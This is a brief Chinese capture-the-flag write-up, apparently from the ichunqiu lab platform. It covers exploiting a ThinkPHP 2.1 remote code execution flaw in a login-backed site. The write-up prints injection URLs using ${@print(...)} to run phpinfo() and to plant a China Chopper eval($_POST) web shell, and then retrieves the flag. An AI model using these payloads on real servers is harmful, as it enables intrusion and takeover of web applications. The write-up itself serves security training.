看題分析:打開網址,是一個後臺登錄,結合框架漏洞,想到了struts漏洞。
0x00 收集信息
發現網站不是struts架構,於是截包看了下數據,有所發現:
明顯是一個ThinkPHP2.1的產品,直接搜索ThinkPHP2.1+漏洞,找到幾篇任意代碼執行的漏洞。
0x01 任意代碼執行漏洞
根據說明(原理網上比較多,我這裏就不陳述了,別人分析更好),構造利用URL
www.xxx.com/index.php/module/action/param1/${@print(THINK_VERSION)}
www.xxx.com/index.php/module/action/param1/${@print(phpinfo())}
菜刀馬鏈接:
www.xxx.com/index.php/module/action/param1/${@print(eval($_POST(gumin)))}
0x02 getshell+getkey
flag就在html目錄下
實驗環境:www.ichunqiu.com